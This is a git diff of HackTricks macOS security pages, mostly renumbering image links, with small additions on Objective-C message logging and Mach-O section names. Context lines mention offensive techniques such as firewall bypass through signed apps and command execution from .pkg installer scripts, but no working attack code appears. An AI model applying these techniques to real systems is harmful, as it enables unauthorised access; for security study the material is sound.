 The file `/Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/System/Library/PrivateFrameworks/ConfigurationProfiles.framework/ConfigurationProfiles.tbd` exports functions that can be considered **high-level "steps"** of the enrolment process.
 
@@ -112,7 +112,7 @@ The file `/Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/System/Librar
 
 This part of the process occurs when a **user boots a Mac for the first time** (or after a complete wipe)
 
-![](<../../../.gitbook/assets/image (1041).png>)
+![](<../../../.gitbook/assets/image (1044).png>)
 
 or when executing `sudo profiles show -type enrollment`
 
@@ -146,7 +146,7 @@ The response is a JSON dictionary with some important data like:
 
 ### **Step 5: Profile Retrieval**
 
-![](<../../../.gitbook/assets/image (441).png>)
+![](<../../../.gitbook/assets/image (444).png>)
 
 * Request sent to **url provided in DEP profile**.
 * **Anchor certificates** are used to **evaluate trust** if provided.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md
index d98c442f8..f939e8aa1 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -140,7 +140,7 @@ Of course from a red teams perspective you should be also interested in escalati
 * [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)
 * [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY)
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md
index 1c95b7ae6..112ac4c4b 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md
@@ -99,7 +99,7 @@ ioreg -p <plane> #Check other plane
 
 You could download **`IORegistryExplorer`** from **Xcode Additional Tools** from [**https://developer.apple.com/download/all/**](https://developer.apple.com/download/all/) and inspect the **macOS IORegistry** through a **graphical** interface.
 
-<figure><img src="../../../.gitbook/assets/image (1164).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1167).png" alt="" width="563"><figcaption></figcaption></figure>
 
 In IORegistryExplorer, "planes" are used to organize and display the relationships between different objects in the IORegistry. Each plane represents a specific type of relationship or a particular view of the system's hardware and driver configuration. Here are some of the common planes you might encounter in IORegistryExplorer:
 
@@ -181,9 +181,9 @@ You could obtain these for example from a [**firmware image (ipsw)**](./#ipsw).
 
 You could start decompiling the **`externalMethod`** function as this is the driver function that will be receiving the call and calling the correct function:
 
-<figure><img src="../../../.gitbook/assets/image (1165).png" alt="" width="315"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1168).png" alt="" width="315"><figcaption></figcaption></figure>
 
-<figure><img src="../../../.gitbook/assets/image (1166).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1169).png" alt=""><figcaption></figcaption></figure>
 
 That awful call demagled means:
 
@@ -211,35 +211,35 @@ IOUserClient2022::dispatchExternalMethod(uint32_t selector, IOExternalMethodArgu
 
 With this info you can rewrite Ctrl+Right -> `Edit function signature` and set the known types:
 
-<figure><img src="../../../.gitbook/assets/image (1171).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1174).png" alt=""><figcaption></figcaption></figure>
 
 The new decompiled code will look like:
 
-<figure><img src="../../../.gitbook/assets/image (1172).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1175).png" alt=""><figcaption></figcaption></figure>
 
 For the next step we need to have defined the **`IOExternalMethodDispatch2022`** struct. It's opensource in [https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176), you could define it:
 
-<figure><img src="../../../.gitbook/assets/image (1167).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1170).png" alt=""><figcaption></figcaption></figure>
 
 Now, following the `(IOExternalMethodDispatch2022 *)&sIOExternalMethodArray` you can see a lot of data:
 
-<figure><img src="../../../.gitbook/assets/image (1173).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1176).png" alt="" width="563"><figcaption></figcaption></figure>
 
 Change the Data Type to **`IOExternalMethodDispatch2022:`**
 
-<figure><img src="../../../.gitbook/assets/image (1174).png" alt="" width="375"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1177).png" alt="" width="375"><figcaption></figcaption></figure>
 
 after the change:
 
-<figure><img src="../../../.gitbook/assets/image (1176).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1179).png" alt="" width="563"><figcaption></figcaption></figure>
 
 And as we now in there we have an **array of 7 elements** (check the final decompiled code), click to create an array of 7 elements:
 
-<figure><img src="../../../.gitbook/assets/image (1177).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1180).png" alt="" width="563"><figcaption></figcaption></figure>
 
 After the array is created you can see all the exported functions:
 
-<figure><img src="../../../.gitbook/assets/image (1178).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1181).png" alt=""><figcaption></figcaption></figure>
 
 {% hint style="success" %}
 If you remember, to **call** an **exported** function from user space we don't need to call the name of the function, but the **selector number**. Here you can see that the selector **0** is the function **`initializeDecoder`**, the selector **1** is **`startDecoder`**, the selector **2** **`initializeEncoder`**...
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
index b18e17a04..2e7ec3dfc 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
@@ -22,7 +22,7 @@ Obviously, this is so powerful that it is **complicated to load a kernel extensi
 
 * When **entering recovery mode**, kernel **extensions must be allowed** to be loaded:
 
-<figure><img src="../../../.gitbook/assets/image (324).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (327).png" alt=""><figcaption></figcaption></figure>
 
 * The kernel extension must be **signed with a kernel code signing certificate**, which can only be **granted by Apple**. Who will review in detail the company and the reasons why it is needed.
 * The kernel extension must also be **notarized**, Apple will be able to check it for malware.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
index 76129457e..63023ebc2 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
@@ -18,7 +18,7 @@ Other ways to support HackTricks:
 
 Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
 
-<figure><img src="../../../.gitbook/assets/image (603).png" alt="https://knight.sc/images/system-extension-internals-1.png"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (606).png" alt="https://knight.sc/images/system-extension-internals-1.png"><figcaption></figcaption></figure>
 
 There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
 
@@ -58,7 +58,7 @@ The events that the Endpoint Security framework can monitor are categorized into
 
 ### Endpoint Security Framework Architecture
 
-<figure><img src="../../../.gitbook/assets/image (1065).png" alt="https://www.youtube.com/watch?v=jaVkpM1UqOs"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1068).png" alt="https://www.youtube.com/watch?v=jaVkpM1UqOs"><figcaption></figcaption></figure>
 
 **User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller:
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
index b59b98a9a..3bb57a506 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Static Analysis
 
@@ -143,7 +143,7 @@ Note that this names could be obfuscated to make the reversing of the binary mor
 
 When a function is called in a binary that uses objective-C, the compiled code instead of calling that function, it will call **`objc_msgSend`**. Which will be calling the final function:
 
-![](<../../../.gitbook/assets/image (302).png>)
+![](<../../../.gitbook/assets/image (305).png>)
 
 The params this function expects are:
 
@@ -231,11 +231,11 @@ In the left panel of hopper it's possible to see the symbols (**Labels**) of the
 
 In the middle panel you can see the **dissasembled code**. And you can see it a **raw** disassemble, as **graph**, as **decompiled** and as **binary** by clicking on the respective icon:
 
-<figure><img src="../../../.gitbook/assets/image (340).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (343).png" alt=""><figcaption></figcaption></figure>
 
 Right clicking in a code object you can see **references to/from that object** or even change its name (this doesn't work in decompiled pseudocode):
 
-<figure><img src="../../../.gitbook/assets/image (1114).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1117).png" alt=""><figcaption></figcaption></figure>
 
 Moreover, in the **middle down you can write python commands**.
 
@@ -348,7 +348,7 @@ ktrace trace -s -S -t c -c ls | grep "ls("
 [**SpriteTree**](https://themittenmac.com/tools/) is a tool to prints the relations between processes.\
 You need to monitor your mac with a command like **`sudo eslogger fork exec rename create > cap.json`** (the terminal launching this required FDA). And then you can load the json in this tool to viwe all the relations:
 
-<figure><img src="../../../.gitbook/assets/image (1179).png" alt="" width="375"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1182).png" alt="" width="375"><figcaption></figcaption></figure>
 
 ### FileMonitor
 
@@ -362,7 +362,7 @@ You need to monitor your mac with a command like **`sudo eslogger fork exec rena
 
 [**Apple Instruments**](https://developer.apple.com/library/archive/documentation/Performance/Conceptual/CellularBestPractices/Appendix/Appendix.html) are part of Xcode’s Developer tools – used for monitoring application performance, identifying memory leaks and tracking filesystem activity.
 
-![](<../../../.gitbook/assets/image (1135).png>)
+![](<../../../.gitbook/assets/image (1138).png>)
 
 ### fs\_usage
 
@@ -554,10 +554,9 @@ litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash
 * [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
 * [**The Art of Mac Malware: The Guide to Analyzing Malicious Software**](https://taomm.org/)
 
-
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
index 14fe59d3d..d2d381900 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
@@ -77,7 +77,7 @@ They are often used to store the **base address of the thread-local storage** re
 **PSTATE** contains several process components serialized into the operating-system-visible **`SPSR_ELx`** special register, being X the **permission** **level of the triggered** exception (this allows to recover the process state when the exception ends).\
 These are the accessible fields:
 
-<figure><img src="../../../.gitbook/assets/image (1193).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1196).png" alt=""><figcaption></figcaption></figure>
 
 * The **`N`**, **`Z`**, **`C`** and **`V`** condition flags:
   * **`N`** means the operation yielded a negative result
@@ -121,7 +121,7 @@ ARM64 instructions generally have the **format `opcode dst, src1, src2`**, where
   * Example: `ldr x0, [x1]` — This loads a value from the memory location pointed to by `x1` into `x0`.
   * **Offset mode**: An offset affecting the orin pointer is indicated, for example:
     * `ldr x2, [x1, #8]`, this will load in x2 the value from x1 + 8
-    * &#x20;`ldr x2, [x0, x1, lsl #2]`, this will load in x2 an object from the array x0, from the position x1 (index) \* 4
+    * `ldr x2, [x0, x1, lsl #2]`, this will load in x2 an object from the array x0, from the position x1 (index) \* 4
   * **Pre-indexed mode**: This will apply calculations to the origin, get the result and also store the new origin in the origin.
     * `ldr x2, [x1, #8]!`, this will load `x1 + 8` in `x2` and store in x1 the result of `x1 + 8`
     * `str lr, [sp, #-4]!`, Store the link register in sp and update the register sp
@@ -189,12 +189,12 @@ ARM64 instructions generally have the **format `opcode dst, src1, src2`**, where
   * Example: `tst X1, #7` Check if any of the last 3 bits of X1 is 1
 * **`teq`**: XOR operation discarding the result
 * **`b`**: Unconditional Branch
-  * Example: `b myFunction`&#x20;
+  * Example: `b myFunction`
   * Note that this won't fill the link register with the return address (not suitable for subrutine calls that needs to return back)
 * **`bl`**: **Branch** with link, used to **call** a **subroutine**. Stores the **return address in `x30`**.
   * Example: `bl myFunction` — This calls the function `myFunction` and stores the return address in `x30`.
   * Note that this won't fill the link register with the return address (not suitable for subrutine calls that needs to return back)
-* **`blr`**: **Branch** with Link to Register, used to **call** a **subroutine** where the target is **specified** in a **register**. Stores the return address in `x30`. (This is&#x20;
+* **`blr`**: **Branch** with Link to Register, used to **call** a **subroutine** where the target is **specified** in a **register**. Stores the return address in `x30`. (This is
   * Example: `blr x1` — This calls the function whose address is contained in `x1` and stores the return address in `x30`.
 * **`ret`**: **Return** from **subroutine**, typically using the address in **`x30`**.
   * Example: `ret` — This returns from the current subroutine using the return address in `x30`.
@@ -301,7 +301,7 @@ This is done by **saving the processor state from the `CPSR` to the `SPSR`** of
 
 In AArch32 the CPSR works similar to **`PSTATE`** in AArch64 and is also stored in **`SPSR_ELx`** when a exception is taken to restore later the execution:
 
-<figure><img src="../../../.gitbook/assets/image (1194).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1197).png" alt=""><figcaption></figcaption></figure>
 
 The fields are divided in some groups:
 
@@ -325,7 +325,7 @@ The fields are divided in some groups:
 * **`E`** bit: Indicates the **endianness**.
 * **Mode and Exception Mask Bits** (0-4): They determine the current execution state. The **5th** one indicates if the program runs as 32bit (a 1) or 64bit (a 0). The other 4 represents the **exception mode currently in used** (when a exception occurs and it's being handled). The number set **indicates the current priority** in case another exception is triggered while this is being handled.
 
-<figure><img src="../../../.gitbook/assets/image (1197).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1200).png" alt=""><figcaption></figcaption></figure>
 
 * **`AIF`**: Certain exceptions can be disabled using the bits **`A`**, `I`, `F`. If **`A`** is 1 it means **asynchronous aborts** will be triggered. The **`I`** configures to respond to external hardware **Interrupts Requests** (IRQs). and the F is related to **Fast Interrupt Requests** (FIRs).
 
@@ -394,6 +394,10 @@ whoami
 )
 ```
 
+{% hint style="success" %}
+Setting the env variable `NSObjCMessageLoggingEnabled=1` it's possible to log when this function is called in a file like `/tmp/msgSends-pid`.
+{% endhint %}
+
 ### Shellcodes
 
 To compile:
@@ -424,7 +428,6 @@ for s in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ;
 done
 ```
 
-
 <details>
 
 <summary>C code to test the shellcode</summary>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md b/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
index 03cf5d240..4ed31f851 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
@@ -50,7 +50,7 @@ lsof -i TCP -sTCP:ESTABLISHED
 
 DNS resolutions are done via **`mdnsreponder`** signed application which will probably vi allowed to contact DNS servers.
 
-<figure><img src="../../.gitbook/assets/image (464).png" alt="https://www.youtube.com/watch?v=UlT5KFTMn2k"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (468).png" alt="https://www.youtube.com/watch?v=UlT5KFTMn2k"><figcaption></figcaption></figure>
 
 ### Via Browser apps
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
index db97cc63e..76247d0de 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
@@ -112,7 +112,7 @@ dyldex_all [dyld_shared_cache_path] # Extract all
 Note that even if `dyld_shared_cache_util` tool doesn't work, you can pass the **shared dyld binary to Hopper** and Hopper will be able to identify all the libraries and let you **select which one** you want to investigate:
 {% endhint %}
 
-<figure><img src="../../../.gitbook/assets/image (1149).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1152).png" alt="" width="563"><figcaption></figcaption></figure>
 
 Some extractors won't work as dylibs are prelinked with hard coded addresses in therefore they might be jumping to unknown addresses
 
@@ -257,6 +257,8 @@ Mac OS binaries usually are compiled as **universal binaries**. A **universal bi
 [universal-binaries-and-mach-o-format.md](universal-binaries-and-mach-o-format.md)
 {% endcontent-ref %}
 
+## macOS Process Memory
+
 ## macOS memory dumping
 
 {% content-ref url="macos-memory-dumping.md" %}
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
index f6b873a76..c3ff466dc 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
@@ -58,7 +58,7 @@ Note that **`.dmg`** installers support **so many formats** that in the past som
 
 ### Hierarchy
 
-<figure><img src="../../../.gitbook/assets/image (222).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (225).png" alt=""><figcaption></figcaption></figure>
 
 The hierarchy of a DMG file can be different based on the content. However, for application DMGs, it usually follows this structure:
 
@@ -102,7 +102,7 @@ It's possible to just generate a **`.pkg`** file with **pre and post-install scr
 
 It's possible to add **`<script>`** tags in the **distribution xml** file of the package and that code will get executed and it can **execute commands** using **`system.run`**:
 
-<figure><img src="../../../.gitbook/assets/image (1040).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1043).png" alt=""><figcaption></figcaption></figure>
 
 ## References
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md
index 41f3cb26d..0b7df9cc8 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Memory Artifacts
 
@@ -82,7 +82,7 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -101,7 +101,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
index ea4a6e07a..8a8068b53 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
@@ -24,7 +24,7 @@ These binaries follows the **Mach-O structure** which is basically compased of:
 * Load Commands
 * Data
 
-![https://alexdremov.me/content/images/2022/10/6XLCD.gif](<../../../.gitbook/assets/image (467).png>)
+![https://alexdremov.me/content/images/2022/10/6XLCD.gif](<../../../.gitbook/assets/image (470).png>)
 
 ## Fat Header
 
@@ -78,7 +78,7 @@ fat_magic FAT_MAGIC
 
 or using the [Mach-O View](https://sourceforge.net/projects/machoview/) tool:
 
-<figure><img src="../../../.gitbook/assets/image (1091).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1094).png" alt=""><figcaption></figcaption></figure>
 
 As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch.
 
@@ -138,7 +138,7 @@ MH_MAGIC_64    ARM64          E USR00     EXECUTE    19       1728   NOUNDEFS DY
 
 Or using [Mach-O View](https://sourceforge.net/projects/machoview/):
 
-<figure><img src="../../../.gitbook/assets/image (1130).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1133).png" alt=""><figcaption></figcaption></figure>
 
 ## **Mach-O Flags**
 
@@ -205,7 +205,7 @@ In the header first you find the **segment header**:
 
 Example of segment header:
 
-<figure><img src="../../../.gitbook/assets/image (1123).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1126).png" alt=""><figcaption></figcaption></figure>
 
 This header defines the **number of sections whose headers appear after** it:
 
@@ -228,11 +228,11 @@ struct section_64 { /* for 64-bit architectures */
 
 Example of **section header**:
 
-<figure><img src="../../../.gitbook/assets/image (1105).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1108).png" alt=""><figcaption></figcaption></figure>
 
 If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC`
 
-<figure><img src="../../../.gitbook/assets/image (698).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (701).png" alt=""><figcaption></figcaption></figure>
 
 It's also possible to get **headers information** from the **command line** with:
 
@@ -355,7 +355,7 @@ struct dylib {
 };
 ```
 
-![](<../../../.gitbook/assets/image (483).png>)
+![](<../../../.gitbook/assets/image (486).png>)
 
 You could also get this info from the cli with:
 
@@ -396,7 +396,7 @@ This includes:
 
 To check it you could use the [**Mach-O View**](https://sourceforge.net/projects/machoview/) tool:
 
-<figure><img src="../../../.gitbook/assets/image (1117).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1120).png" alt=""><figcaption></figcaption></figure>
 
 Or from the cli:
 
@@ -404,6 +404,28 @@ Or from the cli:
 size -m /bin/ls
 ```
 
+## Objetive-C Common Sections
+
+In `__TEXT` segment (r-x):
+
+* `__objc_classname`: Class names (strings)
+* `__objc_methname`: Method names (strings)
+* `__objc_methtype`: Method types (strings)
+
+In `__DATA` segment (rw-):
+
+* `__objc_classlist`: Pointers to all Objetive-C classes
+* `__objc_nlclslist`: Pointers to Non-Lazy Objective-C classes
+* `__objc_catlist`: Pointer to Categories
+* `__objc_nlcatlist`: Pointer to Non-Lazy Categories
+* `__objc_protolist`: Protocols list
+* `__objc_const`: Constant data
+* `__objc_imageinfo`, `__objc_selrefs`, `objc__protorefs`...
+
+## Swift
+
+* `_swift_typeref`, `_swift3_capture`, `_swift3_assocty`, `_swift3_types, _swift3_proto`, `_swift3_fieldmd`, `_swift3_builtin`, `_swift3_reflstr`
+
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md b/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md
index 42c96f4cf..88652522b 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md
@@ -210,27 +210,27 @@ Currently Ghidra doesn't understand neither the ObjectiveC **`dispatch_block_t`*
 
 So if you want it to understand them, you could just **declare them**:
 
-<figure><img src="../../.gitbook/assets/image (1157).png" alt="" width="563"><figcaption></figcaption></figure>
-
-<figure><img src="../../.gitbook/assets/image (1159).png" alt="" width="563"><figcaption></figcaption></figure>
-
 <figure><img src="../../.gitbook/assets/image (1160).png" alt="" width="563"><figcaption></figcaption></figure>
 
+<figure><img src="../../.gitbook/assets/image (1162).png" alt="" width="563"><figcaption></figcaption></figure>
+
+<figure><img src="../../.gitbook/assets/image (1163).png" alt="" width="563"><figcaption></figcaption></figure>
+
 Then, find a place in the code where they are **used**:
 
 {% hint style="success" %}
 Note all of references made to "block" to understand how you could figure out that the struct is being used.
 {% endhint %}
 
-<figure><img src="../../.gitbook/assets/image (1161).png" alt="" width="563"><figcaption></figcaption></figure>
